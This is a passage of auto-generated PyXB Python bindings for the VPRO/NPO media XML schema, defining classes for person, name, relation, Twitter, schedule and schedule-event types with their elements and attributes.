familyName = property(__familyName.value, __familyName.set, None, None)
# Attribute role uses Python identifier role
__role = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'role'), 'role', '__urnvpromedia2009_personType_role', _module_typeBindings.roleType, required=True)
__role._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 556, 4)
__role._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 556, 4)
role = property(__role.value, __role.set, None, None)
# Attribute gtaaUri uses Python identifier gtaaUri
__gtaaUri = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'gtaaUri'), 'gtaaUri', '__urnvpromedia2009_personType_gtaaUri', pyxb.binding.datatypes.string)
__gtaaUri._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 557, 4)
__gtaaUri._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 557, 4)
gtaaUri = property(__gtaaUri.value, __gtaaUri.set, None, None)
# Attribute gtaaStatus uses Python identifier gtaaStatus
__gtaaStatus = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'gtaaStatus'), 'gtaaStatus', '__urnvpromedia2009_personType_gtaaStatus', _module_typeBindings.gtaaStatusType)
__gtaaStatus._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 558, 4)
__gtaaStatus._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 558, 4)
gtaaStatus = property(__gtaaStatus.value, __gtaaStatus.set, None, None)
_ElementMap.update({
__givenName.name() : __givenName,
__familyName.name() : __familyName
})
_AttributeMap.update({
__role.name() : __role,
__gtaaUri.name() : __gtaaUri,
__gtaaStatus.name() : __gtaaStatus
})
_module_typeBindings.personType = personType
Namespace.addCategoryObject('typeBinding', 'personType', personType)
# Complex type {urn:vpro:media:2009}nameType with content type ELEMENT_ONLY
class nameType (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {urn:vpro:media:2009}nameType with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'nameType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 561, 2)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {urn:vpro:media:2009}name uses Python identifier name
__name = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'name'), 'name', '__urnvpromedia2009_nameType_urnvpromedia2009name', False, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 563, 6), )
name = property(__name.value, __name.set, None, None)
# Element {urn:vpro:media:2009}scopeNote uses Python identifier scopeNote
__scopeNote = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'scopeNote'), 'scopeNote', '__urnvpromedia2009_nameType_urnvpromedia2009scopeNote', True, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 564, 6), )
scopeNote = property(__scopeNote.value, __scopeNote.set, None, None)
# Attribute role uses Python identifier role
__role = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'role'), 'role', '__urnvpromedia2009_nameType_role', _module_typeBindings.roleType, required=True)
__role._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 566, 4)
__role._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 566, 4)
role = property(__role.value, __role.set, None, None)
# Attribute gtaaUri uses Python identifier gtaaUri
__gtaaUri = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'gtaaUri'), 'gtaaUri', '__urnvpromedia2009_nameType_gtaaUri', pyxb.binding.datatypes.string)
__gtaaUri._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 567, 4)
__gtaaUri._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 567, 4)
gtaaUri = property(__gtaaUri.value, __gtaaUri.set, None, None)
# Attribute gtaaStatus uses Python identifier gtaaStatus
__gtaaStatus = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'gtaaStatus'), 'gtaaStatus', '__urnvpromedia2009_nameType_gtaaStatus', _module_typeBindings.gtaaStatusType)
__gtaaStatus._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 568, 4)
__gtaaStatus._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 568, 4)
gtaaStatus = property(__gtaaStatus.value, __gtaaStatus.set, None, None)
_ElementMap.update({
__name.name() : __name,
__scopeNote.name() : __scopeNote
})
_AttributeMap.update({
__role.name() : __role,
__gtaaUri.name() : __gtaaUri,
__gtaaStatus.name() : __gtaaStatus
})
_module_typeBindings.nameType = nameType
Namespace.addCategoryObject('typeBinding', 'nameType', nameType)
# Complex type {urn:vpro:media:2009}relationType with content type SIMPLE
class relationType (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {urn:vpro:media:2009}relationType with content type SIMPLE"""
_TypeDefinition = pyxb.binding.datatypes.string
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_SIMPLE
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'relationType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 644, 2)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.string
# Attribute type uses Python identifier type
__type = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'type'), 'type', '__urnvpromedia2009_relationType_type', _module_typeBindings.relationTypeType, required=True)
__type._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 647, 8)
__type._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 647, 8)
type = property(__type.value, __type.set, None, None)
# Attribute broadcaster uses Python identifier broadcaster
__broadcaster = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'broadcaster'), 'broadcaster', '__urnvpromedia2009_relationType_broadcaster', pyxb.binding.datatypes.string, required=True)
__broadcaster._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 648, 8)
__broadcaster._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 648, 8)
broadcaster = property(__broadcaster.value, __broadcaster.set, None, None)
# Attribute uriRef uses Python identifier uriRef
__uriRef = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'uriRef'), 'uriRef', '__urnvpromedia2009_relationType_uriRef', pyxb.binding.datatypes.anyURI)
__uriRef._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 649, 8)
__uriRef._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 649, 8)
uriRef = property(__uriRef.value, __uriRef.set, None, None)
# Attribute urn uses Python identifier urn
__urn = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'urn'), 'urn', '__urnvpromedia2009_relationType_urn', pyxb.binding.datatypes.anyURI)
__urn._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 650, 8)
__urn._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 650, 8)
urn = property(__urn.value, __urn.set, None, None)
_ElementMap.update({
})
_AttributeMap.update({
__type.name() : __type,
__broadcaster.name() : __broadcaster,
__uriRef.name() : __uriRef,
__urn.name() : __urn
})
_module_typeBindings.relationType = relationType
Namespace.addCategoryObject('typeBinding', 'relationType', relationType)
# Complex type {urn:vpro:media:2009}twitterType with content type SIMPLE
class twitterType (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {urn:vpro:media:2009}twitterType with content type SIMPLE"""
_TypeDefinition = pyxb.binding.datatypes.string
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_SIMPLE
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'twitterType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 689, 2)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.string
# Attribute type uses Python identifier type
__type = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'type'), 'type', '__urnvpromedia2009_twitterType_type', _module_typeBindings.STD_ANON)
__type._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 692, 8)
__type._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 692, 8)
type = property(__type.value, __type.set, None, None)
_ElementMap.update({
})
_AttributeMap.update({
__type.name() : __type
})
_module_typeBindings.twitterType = twitterType
Namespace.addCategoryObject('typeBinding', 'twitterType', twitterType)
# Complex type {urn:vpro:media:2009}scheduleType with content type ELEMENT_ONLY
class scheduleType (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {urn:vpro:media:2009}scheduleType with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'scheduleType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 711, 2)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {urn:vpro:media:2009}scheduleEvent uses Python identifier scheduleEvent
__scheduleEvent = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'scheduleEvent'), 'scheduleEvent', '__urnvpromedia2009_scheduleType_urnvpromedia2009scheduleEvent', True, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 713, 6), )
scheduleEvent = property(__scheduleEvent.value, __scheduleEvent.set, None, None)
# Attribute channel uses Python identifier channel
__channel = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'channel'), 'channel', '__urnvpromedia2009_scheduleType_channel', _module_typeBindings.channelEnum)
__channel._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 715, 4)
__channel._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 715, 4)
channel = property(__channel.value, __channel.set, None, None)
# Attribute net uses Python identifier net
__net = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'net'), 'net', '__urnvpromedia2009_scheduleType_net', pyxb.binding.datatypes.string)
__net._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 716, 4)
__net._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 716, 4)
net = property(__net.value, __net.set, None, None)
# Attribute date uses Python identifier date
__date = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'date'), 'date', '__urnvpromedia2009_scheduleType_date', pyxb.binding.datatypes.date)
__date._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 717, 4)
__date._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 717, 4)
date = property(__date.value, __date.set, None, None)
# Attribute releaseVersion uses Python identifier releaseVersion
__releaseVersion = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'releaseVersion'), 'releaseVersion', '__urnvpromedia2009_scheduleType_releaseVersion', pyxb.binding.datatypes.short)
__releaseVersion._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 718, 4)
__releaseVersion._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 718, 4)
releaseVersion = property(__releaseVersion.value, __releaseVersion.set, None, None)
# Attribute start uses Python identifier start
__start = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'start'), 'start', '__urnvpromedia2009_scheduleType_start', pyxb.binding.datatypes.dateTime)
__start._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 719, 4)
__start._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 719, 4)
start = property(__start.value, __start.set, None, None)
# Attribute stop uses Python identifier stop
__stop = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'stop'), 'stop', '__urnvpromedia2009_scheduleType_stop', pyxb.binding.datatypes.dateTime)
__stop._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 720, 4)
__stop._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 720, 4)
stop = property(__stop.value, __stop.set, None, None)
# Attribute reruns uses Python identifier reruns
__reruns = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'reruns'), 'reruns', '__urnvpromedia2009_scheduleType_reruns', pyxb.binding.datatypes.boolean)
__reruns._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 721, 4)
__reruns._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 721, 4)
reruns = property(__reruns.value, __reruns.set, None, None)
_ElementMap.update({
__scheduleEvent.name() : __scheduleEvent
})
_AttributeMap.update({
__channel.name() : __channel,
__net.name() : __net,
__date.name() : __date,
__releaseVersion.name() : __releaseVersion,
__start.name() : __start,
__stop.name() : __stop,
__reruns.name() : __reruns
})
_module_typeBindings.scheduleType = scheduleType
Namespace.addCategoryObject('typeBinding', 'scheduleType', scheduleType)
# Complex type {urn:vpro:media:2009}scheduleEventType with content type ELEMENT_ONLY
class scheduleEventType (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {urn:vpro:media:2009}scheduleEventType with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'scheduleEventType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 730, 2)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {urn:vpro:media:2009}title uses Python identifier title
__title = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'title'), 'title', '__urnvpromedia2009_scheduleEventType_urnvpromedia2009title', True, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 732, 6), )
title = property(__title.value, __title.set, None, None)
# Element {urn:vpro:media:2009}description uses Python identifier description
__description = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'description'), 'description', '__urnvpromedia2009_scheduleEventType_urnvpromedia2009description', True, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 733, 6), )
description = property(__description.value, __description.set, None, None)
# Element {urn:vpro:media:2009}repeat uses Python identifier repeat
__repeat = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'repeat'), 'repeat', '__urnvpromedia2009_scheduleEventType_urnvpromedia2009repeat', False, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 734, 6), )
repeat = property(__repeat.value, __repeat.set, None, None)
# Element {urn:vpro:media:2009}memberOf uses Python identifier memberOf
__memberOf = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'memberOf'), 'memberOf', '__urnvpromedia2009_scheduleEventType_urnvpromedia2009memberOf', False, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 735, 6), )
memberOf = property(__memberOf.value, __memberOf.set, None, None)
# Element {urn:vpro:media:2009}avAttributes uses Python identifier avAttributes
__avAttributes = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'avAttributes'), 'avAttributes', '__urnvpromedia2009_scheduleEventType_urnvpromedia2009avAttributes', False, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 736, 6), )
avAttributes = property(__avAttributes.value, __avAttributes.set, None, None)
# Element {urn:vpro:media:2009}textSubtitles uses Python identifier textSubtitles
__textSubtitles = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'textSubtitles'), 'textSubtitles', '__urnvpromedia2009_scheduleEventType_urnvpromedia2009textSubtitles', False, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 737, 6), )
textSubtitles = property(__textSubtitles.value, __textSubtitles.set, None, None)
# Element {urn:vpro:media:2009}textPage uses Python identifier textPage
__textPage = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'textPage'), 'textPage', '__urnvpromedia2009_scheduleEventType_urnvpromedia2009textPage', False, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 738, 6), )
textPage = property(__textPage.value, __textPage.set, None, None)
# Element {urn:vpro:media:2009}guideDay uses Python identifier guideDay
__guideDay = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'guideDay'), 'guideDay', '__urnvpromedia2009_scheduleEventType_urnvpromedia2009guideDay', False, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 739, 6), )
guideDay = property(__guideDay.value, __guideDay.set, None, None)
# Element {urn:vpro:media:2009}start uses Python identifier start
__start = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'start'), 'start', '__urnvpromedia2009_scheduleEventType_urnvpromedia2009start', False, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 740, 6), )
start = property(__start.value, __start.set, None, None)
# Element {urn:vpro:media:2009}offset uses Python identifier offset
__offset = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'offset'), 'offset', '__urnvpromedia2009_scheduleEventType_urnvpromedia2009offset', False, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 741, 6), )
offset = property(__offset.value, __offset.set, None, None)
# Element {urn:vpro:media:2009}duration uses Python identifier duration
__duration = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'duration'), 'duration', '__urnvpromedia2009_scheduleEventType_urnvpromedia2009duration', False, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 742, 6), )
duration = property(__duration.value, __duration.set, None, None)
# Element {urn:vpro:media:2009}poProgID uses Python identifier poProgID
__poProgID = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'poProgID'), 'poProgID', '__urnvpromedia2009_scheduleEventType_urnvpromedia2009poProgID', False, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 743, 6), )
poProgID = property(__poProgID.value, __poProgID.set, None, None)
# Element {urn:vpro:media:2009}primaryLifestyle uses Python identifier primaryLifestyle
__primaryLifestyle = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'primaryLifestyle'), 'primaryLifestyle', '__urnvpromedia2009_scheduleEventType_urnvpromedia2009primaryLifestyle', False, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 744, 6), )
primaryLifestyle = property(__primaryLifestyle.value, __primaryLifestyle.set, None, None)
# Element {urn:vpro:media:2009}secondaryLifestyle uses Python identifier secondaryLifestyle
__secondaryLifestyle = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'secondaryLifestyle'), 'secondaryLifestyle', '__urnvpromedia2009_scheduleEventType_urnvpromedia2009secondaryLifestyle', False, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 745, 6), )
secondaryLifestyle = property(__secondaryLifestyle.value, __secondaryLifestyle.set, None, None)
# Attribute imi uses Python identifier imi
__imi = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'imi'), 'imi', '__urnvpromedia2009_scheduleEventType_imi', pyxb.binding.datatypes.string)
__imi._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 747, 4)
__imi._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 747, 4)
imi = property(__imi.value, __imi.set, None, None)
# Attribute channel uses Python identifier channel
__channel = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'channel'), 'channel', '__urnvpromedia2009_scheduleEventType_channel', _module_typeBindings.channelEnum)
__channel._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 748, 4)
__channel._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 748, 4)
channel = property(__channel.value, __channel.set, None, None)
# Attribute net uses Python identifier net
__net = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'net'), 'net', '__urnvpromedia2009_scheduleEventType_net', pyxb.binding.datatypes.string)
__net._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 749, 4)
__net._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 749, 4)
net = property(__net.value, __net.set, None, None)
# Attribute guideDay uses Python identifier guideDay_
__guideDay_ = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'guideDay'), 'guideDay_', '__urnvpromedia2009_scheduleEventType_guideDay', pyxb.binding.datatypes.date)
__guideDay_._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 750, 4)
__guideDay_._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 750, 4)
guideDay_ = property(__guideDay_.value, __guideDay_.set, None, None)
# Attribute midRef uses Python identifier midRef
__midRef = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'midRef'), 'midRef', '__urnvpromedia2009_scheduleEventType_midRef', _module_typeBindings.midType, required=True)
__midRef._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 751, 4)
__midRef._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 751, 4)
midRef = property(__midRef.value, __midRef.set, None, None)
# Attribute urnRef uses Python identifier urnRef
__urnRef = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'urnRef'), 'urnRef', '__urnvpromedia2009_scheduleEventType_urnRef', pyxb.binding.datatypes.anyURI, required=True)
__urnRef._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 752, 4)
__urnRef._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 752, 4)
urnRef = property(__urnRef.value, __urnRef.set, None, None)
# Attribute type uses Python identifier type
__type = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'type'), 'type', '__urnvpromedia2009_scheduleEventType_type', _module_typeBindings.scheduleEventTypeEnum)
__type._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 753, 4)
__type._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 753, 4)
type = property(__type.value, __type.set, None, None)
_ElementMap.update({
__title.name() : __title,
__description.name() : __description,
__repeat.name() : __repeat,
__memberOf.name() : __memberOf,
__avAttributes.name() : __avAttributes,
__textSubtitles.name() : __textSubtitles,
__textPage.name() : __textPage,
__guideDay.name() : __guideDay,
__start.name() : __start,
__offset.name() : __offset,
__duration.name() : __duration,
__poProgID.name() : __poProgID,
__primaryLifestyle.name() : __primaryLifestyle,
__secondaryLifestyle.name() : __secondaryLifestyle
})
_AttributeMap.update({
__imi.name() : __imi,
__channel.name() : __channel,
__net.name() : __net,
__guideDay_.name() : __guideDay_,
__midRef.name() : __midRef,
__urnRef.name() : __urnRef,
__type.name() : __type
})
_module_typeBindings.scheduleEventType = scheduleEventType
Namespace.addCategoryObject('typeBinding', 'scheduleEventType', scheduleEventType)
# Complex type {urn:vpro:media:2009}scheduleEventTitle with content type SIMPLE
class scheduleEventTitle (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {urn:vpro:media:2009}scheduleEventTitle with content type SIMPLE"""
_TypeDefinition = pyxb.binding.datatypes.string
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_SIMPLE
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'scheduleEventTitle')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 756, 2)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.string
# Attribute owner uses Python identifier owner
__owner = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'owner'), 'owner', '__urnvpromedia2009_scheduleEventTitle_owner', _ImportedBinding_npoapi_xml_shared.ownerTypeEnum, required=True)
__owner._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 759, 8)
__owner._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 759, 8)
owner = property(__owner.value, __owner.set, None, None)
# Attribute type uses Python identifier type
__type = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'type'), 'type', '__urnvpromedia2009_scheduleEventTitle_type', _module_typeBindings.textualTypeEnum, required=True)
__type._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 760, 8)
__type._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 760, 8)
type = property(__type.value, __type.set, None, None)
_ElementMap.update({
})
_AttributeMap.update({
__owner.name() : __owner,
__type.name() : __type
})
_module_typeBindings.scheduleEventTitle = scheduleEventTitle
Namespace.addCategoryObject('typeBinding', 'scheduleEventTitle', scheduleEventTitle)
# Complex type {urn:vpro:media:2009}scheduleEventDescription with content type SIMPLE
class scheduleEventDescription (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {urn:vpro:media:2009}scheduleEventDescription with content type SIMPLE"""
_TypeDefinition = pyxb.binding.datatypes.string
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_SIMPLE
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'scheduleEventDescription')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 765, 2)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.string
# Attribute owner uses Python identifier owner
__owner = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'owner'), 'owner', '__urnvpromedia2009_scheduleEventDescription_owner', _ImportedBinding_npoapi_xml_shared.ownerTypeEnum, required=True)
__owner._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 768, 8)
__owner._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 768, 8)
owner = property(__owner.value, __owner.set, None, None)
# Attribute type uses Python identifier type
__type = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'type'), 'type', '__urnvpromedia2009_scheduleEventDescription_type', _module_typeBindings.textualTypeEnum, required=True)
__type._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 769, 8)
__type._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 769, 8)
type = property(__type.value, __type.set, None, None)
_ElementMap.update({
})
_AttributeMap.update({
__owner.name() : __owner,
__type.name() : __type
})
_module_typeBindings.scheduleEventDescription = scheduleEventDescription
Namespace.addCategoryObject('typeBinding', 'scheduleEventDescription', scheduleEventDescription)
# Complex type {urn:vpro:media:2009}predictionType with content type SIMPLE
class predictionType (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {urn:vpro:media:2009}predictionType with content type SIMPLE"""
_TypeDefinition = pyxb.binding.datatypes.string
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_SIMPLE
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'predictionType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 793, 2)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.string
# Attribute state uses Python identifier state
__state = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'state'), 'state', '__urnvpromedia2009_predictionType_state', _module_typeBindings.predictionStateEnum)
